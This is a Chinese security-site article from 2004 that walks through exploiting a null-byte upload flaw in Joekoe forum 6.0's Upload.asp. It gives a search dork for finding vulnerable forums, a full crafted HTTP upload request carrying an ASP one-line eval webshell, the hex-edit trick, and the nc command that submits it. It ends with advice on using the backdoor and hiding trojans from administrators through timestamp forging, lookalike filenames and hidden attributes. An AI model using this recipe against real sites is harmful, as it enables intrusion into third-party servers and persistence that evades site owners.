首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
乔客论坛惊暴UPfile严重漏洞
来源:vfocus.net 作者:vfocus 发布时间:2004-08-14  

乔客论坛惊暴UPfile严重漏洞


前一阵动网Upfile.asp文件漏洞真可谓影响深远。把空格(ASC为20H)改成为空(ASC为00H)也就是符串结束符“\0”来成功欺骗计算机,这种提交数据的方式使我深受启发,由此才有此文:乔客6.0的Upload.asp漏洞。同时,也把本篇文章作为的一件最好的生日礼物,献给我最漂亮、最善解人意的女朋友俊俊!
漏洞危害:
  1.用户可以随意建目录。
2.用户可以上传任意后缀名的文件。
下面先来看一下在Upload.asp文件中存在的如下代码:
if not MyFso.folderExists(up_path) then
set up_path=MyFso.CreateFolder(up_path)
end if
如果上传目录不存在,会自动创建,这样我们就可以随便建目录了。再看:
upfile_name=up_name&"."&upfile_name
upfile.SaveAs up_path&upfile_name
可见上传后文件名是:“upfile_name=up_name&"."&upfile_name”,其中Up_name由年、月、日和一个随机数组成,如:2004610173526,而“.”后面的Upfile_name为合法的后缀名,如GIF,本来这是很正常的改名方式,但是计算机在检测字符串时是看是否碰到“\0”字符,如果是,则认为字符串结束了。也就是说我们在构造上传文件名时,只要欺骗计算机,把“2004610173526”文件名改成“2004610173526.asp\0”这样的方式,后面一连串的时间字符我们都可以不要了,从而达到直接将文件名保存为我们定义的文件名的目的。原理是枯燥的,实例才最有趣,下面给大家讲一个详细的利用这个漏洞入侵某论坛的例子。
漏洞利用:
首先在百度里搜索关键字“版本:Joekoe V6.0”,然后会出现好多这样的论坛,我们随便挑一个论坛去注册,然后再打开论坛的任意一个版块如“笑话天地”(http://www.******.com/bbs/forum_list.asp?forum_id=9),点击左上角的“发表新贴”按钮(http://www.******.com/bbs/forum_write.asp?forum_id=9),发新帖子。
上面的准备工作做完后,下面我们就可以正式开始挑战这个论坛了。需要用到的工具有WinSock Expert V0.6 beta 1、UltraEdit、NC、ASP后门和新鲜鸡蛋几只,均可在光盘中找到(咳,鸡蛋是给大家吃的,可别用来扔我,呵呵)。下面我们正式开始:
  运行WinSock Expert->点“open process”按钮->打开IExplore.exe进程,选中第二步打开的网页(某某论坛-笑话开地,发表新贴)->点“open”按钮,这样WinSock Expert就可以监听刚才打开的网页的一举一动了。我们的目的是想要抓取数据上传的包并做进一步的修改。
  然后使用“上传文件”这一功能,浏览上传我们的ASP后门。我用的是“冰狐浪子微型ASP后门”,成功后再配合“海阳顶端2004”一起发挥作用,效果还不错,大家可以考虑这种配合方式。点击“上传”后,页面会出现“上传失败:文件类型只能为gif、jpg、bmp、swf、rar、zip等格式,返回上一页”,不用理会它,现在我们需要的就是这样的信息。
  赶紧到WinSock Expert中提取抓获的有用数据,内容如下:
POST /bbs/upload.asp?action=upfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.******.com/bbs/upload.asp?uppath=forum&upname=&uptext=jk_word
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d311f101009c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.******.com
Content-Length: 710
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: joekoe%5Fonline=onlines=1&login%5Fpassword=fb411be97b3b0d48&guest%5Fname=&iscookies=yes&login%5Fusername=test; ASPSESSIONIDASQQAATR=CNBCLACDOHPJIDDNHLCCICLP


-----------------------------7d311f101009c
Content-Disposition: form-data; name="up_path"


forum
-----------------------------7d311f101009c
Content-Disposition: form-data; name="up_name"


200473153438
-----------------------------7d311f101009c
Content-Disposition: form-data; name="up_text"


jk_word
-----------------------------7d311f101009c
Content-Disposition: form-data; name="file_name1"; filename="C:\Xy\temp\dvupfile\binghu.asp"
Content-Type: text/html


<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('havebug')+'')</SCRIPT>
-----------------------------7d311f101009c
Content-Disposition: form-data; name="submit"


点击上传
-----------------------------7d311f101009c—


  注意你可以将自己抓的包同我的对比,有些地方是不同的,但大体一样,特别要注意最后的“7d311f101009c”后面有个回车,一定要拷贝下来,因为它会影响Content-Length:的长度。再打开UltraEdit,创建一新文件,把第三步用“WinSock Expert”抓的内容复制进去。看过动网上传漏洞分析的朋友都知道,因为在Upload.asp文件中对上传文件的类型做了限制,所以直接上传ASP文件是不行的,我们要把“binghu.asp”文件改成“binghu.gif”。这里的Forum是默认的上传目录,我们可以任意改名,如改成havebug(Content-Length:对应的数字就多了2),也可以改成Forum/../../havebug(Content-Length:对应的数字就多了14),后者是把Havebug建到BBS目录下。这里需要非常小心,因为多一个字母Content-Length的长度就应该增加1,多一个汉字长度应加2。同时,很多网管把这个目录设置成了禁止执行ASP文件,可以利用“../”把地址指向论坛主目录下,总不会有人不让论坛运行吧!
  下面是比较细致的工作了:200473153438是上传的文件名,我们可以改成Hacker.asp并在后面加入一个空格,然后再在UltraEdit里按Ctrl+H进入十六进制编辑,将空格符的20改成00,这样两个长度长度正好一样都为12,省下改Content-Length了。最后保存文件名为:qiaoke.txt。
  修改好了,我们需要将这个数据提交给服务器,这里所用工具是“瑞士军刀——NC”,黑防的光盘上每期都有,大家赶紧去翻出来吧。命令格式是:
nc –vv http://www.******.com 80 <qiaoke.txt
很容易就成功了,在CMD下你将会看到这样的提示:
<table border=0 height='100%'cellspacing=0 cellpadding=0><tr><td height='100%'>
<font class=red>上传成功</font>:<a href='upload/havebug/hacker.asp</td></tr></table>
简单吧?冰狐浪子微型ASP后门就传到服务器上了!现在直接提交你上传的后门路径吧,不出意外的话,你的后门已经在那里等着你咯!
  好了,我不是喜欢废话的人,漏洞分析和利用就说到这里,最后和大家说说后门的利用与隐藏,这是很多朋友最近在黑防论坛上老问的问题。
  我上穿的冰狐浪子微型ASP后门,如果直接利用这个后门的“磁盘信息”功能,可以找到论坛的绝对路径(物理路径),如:
D:\www\******.com\bbs\upload\forum
得到这个路径就意味着你几乎可以把整个站点的结构弄清楚了,对后面的入侵将会带来比较大的帮助。同时,你也可以再利用冰狐浪子微型ASP后门的“写入文件FSO”功能,填好路径写个“海阳顶端2005”上去!
  关于后门的隐藏,可以采取这样的办法:先修改本机时间,然后分别编辑两个木马,然后存盘,使木马文件的时间与论坛中文件一致!这样管理员是非常难以发现这个木马的。同时,修改木马文件名,改成与论坛中的文件名相类似,把它放在“backup(论坛备份)”或“images(图片)”目录下,最后再利用Attrib命令给文件加上只读、隐藏属性,相信论坛管理员要找这样的后门就比较困难了!



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·HP-UX进程资源管理器本地文件破
·PuTTY/PSCP远程任意指令执行漏洞
·Gaim MSN协议处理远程缓冲区溢出
·Apache Mod_DAV LOCK远程拒绝服
·Google工具栏 About 跨站脚本执
·CVSTrac远程任意命令执行漏洞
·UBBThreads dosearch.php远程SQL
·多个Oralce产品本地权限提升漏洞
·Windows 2000系统终端服务器拒绝
·PHP-Nuke多个SQL注入及跨站脚本
·Sun Solaris Volume Manager本地
·Allied Telesyn AT-TFTP Server
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved